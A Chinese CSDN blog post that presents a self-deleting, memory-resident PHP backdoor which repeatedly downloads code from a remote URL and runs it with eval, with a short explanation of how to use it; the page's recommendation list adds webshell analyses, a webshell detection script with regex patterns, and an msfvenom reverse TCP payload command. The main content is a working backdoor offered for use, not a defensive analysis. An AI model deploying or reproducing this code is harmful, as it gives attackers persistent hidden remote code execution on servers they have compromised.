捡了一个非常淫荡的PHP后门,给跪了

最新推荐文章于 2025-06-16 14:07:57 发布
最新推荐文章于 2025-06-16 14:07:57 发布
阅读量1.9w 收藏 61
点赞数 10
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570790

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 

最低0.47元/天 解锁文章

200万优质内容无限畅学
一个不易被发现的PHP后门代码解析
10-25
在代码解析中提到,攻击者利用了一个常见的视觉盲点,即使用了一个位于Esc键下方的特殊符号。这个符号是波浪号(~),其在键盘上的位置紧邻着感叹号(!)下方。这种利用方式的隐蔽性非常好,因为波浪号是键盘上的...
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
程序员注意!这些代码可能会让你“吃牢饭“!
最新发布
z1ztai的博客
06-16 621
" 这是深圳某P2P平台架构师在法庭上崩溃大喊,但代码提交记录中的"反爬优化注释"成了铁证——他因非法吸收公众存款罪获刑5年。当时可能只是为了解决一个业务痛点,一旦被非法使用,就可能触犯法律的红线。开发者无意,使用者有心,莫名其名的就背了锅。他可能只为表现自己的实力,仅仅只是按照需求开发了功能,但是被恶意利用,最终成为背锅侠。尤其一些关于支付的似乎要尤为谨慎,特别是支付成功后,限制体现的时间,很有可能就会用于非法洗钱的黑坑里。不知道你有没有听过面向监狱编程,可能你好好的码着代码,就就被帽子叔叔带走了。
PHP 奇淫巧技
qq_31238721的博客
08-15 232
pathinfo() 函数 定义和用法 pathinfo() 函数以数组的形式返回文件路径的信息。 语法 pathinfo(path,options) 参数 描述 path 必需。规定要检查的路径。 process_sections 可选。规定要返回的数组元素。默认是 all。 可能的值: PATHINFO_DIRNAME - 只返回 ...
纯手工打造HTTP请求,淫领HTTP协议!~
IntelligenceXenogeneicRobot
05-26 569
public static void main(String[] args) throws Exception{ // 我要模拟的URL //http://domain.oray.com/domain/check.php?domain=ixr.name&amp;free=0 String host = "domain.oray.com"; // 解析域名IP Str...
在线扫描php后门_PHP扫描php后门、WebShell、一句话后门
weixin_34646207的博客
03-09 714
PHP扫描php后门、WebShell、一句话后门PHP web shell scandefine("SELF",php_self());error_reporting(E_ERROR);ini_set('max_execution_time',20000);ini_set('memory_limit','512M');header("content-Type: text/html; chars...
在线扫描php后门_webshell后门扫描-PHP
weixin_35740545的博客
03-09 1219
/**********************php扫描后门**********************/error_reporting(E_ERROR);ini_set(’max_execution_time’,20000);ini_set(’memory_limit’,’512M’);header("content-Type: text/html; charset=gb2312");$matc...
在线检测php后门,php后门简单检测脚本
weixin_36018183的博客
03-09 1463
# coding:utf-8import osimport sysimport rerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))','(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))','eval\(base64_decode\(','(e...
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合多种引擎零规则查杀,低误报、高查杀率。 Html Gui界面使用bootstrap 自适应
2019年php后门扫描文件
06-22
php后门扫描文件,下载该文件放到网站根目录,直接访问即可扫描
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
在线扫描php后门_解密php webshell后门
weixin_42400643的博客
03-09 617
仅将此文献给还在为别人的webshell做出贡献的同学。拿下一个网站后,理所当然的传webshll,提权。但是一些人会在webshell中插入小小的一段代码,这样你辛苦拿下的webshell的地址和密码等等就会统统发送给在webshell插后门的人。这段代码可大可小,下面是我随便找的一个phpwebshell,来解密一下其中的后门。首先是用记事本打开这个webshell,可以看到,这个shell的...
Web后门深度检测与清除指南:PHP安全实战
专注于与编程相关的知识内容分享
04-29 954
1. 结构化内容:将内容分为两类后门(远程代码执行后门和管理员密码上传后门),每类包含描述、查杀方式、解决方案。 2. 使用专业术语:准确使用技术术语,避免口语化表达。 3. 逻辑清晰:每类后门的查杀和解决方案应步骤明确。 4. 代码格式化:对涉及的PHP函数和代码进行格式化。 5. 增强可读性:使用标题、列表、代码块等Markdown元素。
fopen 参数'rb' 与'rb+'引发的黑色血案
热门推荐
fengshengwei3的专栏
12-20 1万+
目录 一.背景 二.代码说明 1.下面是出错的代码 2.如何变正常的 三 问题分析 1.关于rb与rb+的区别 2.关于fread的两种形式说明 3.原因分析 一.背景 为了把windows上的算法库移植到linux上,文件读写部分去掉了CreateFile ,换成了fopen,一切都是很平稳,没啥编译错误,但是当我运行读图软件的时候,一张黑色的图片出现了,so, what t...
fopen("http://www.baidu.com", "rb"); rb 模式的解释
Esc80的专栏
03-22 1938
// 对 PHP 5 及更高版本可以使用下面的代码  $handle = fopen("http://www.baidu.com", "rb");  $contents = stream_get_contents($handle);  fclose($handle);  echo $contents;  ?>  首先rb并不是一个参数,那么rb是什么呢?先看看p
Metasploit之多种后门生成
weixin_30790841的博客
08-30 505
本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe 参考“09-Metasploit之我的远程控制软件” li...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值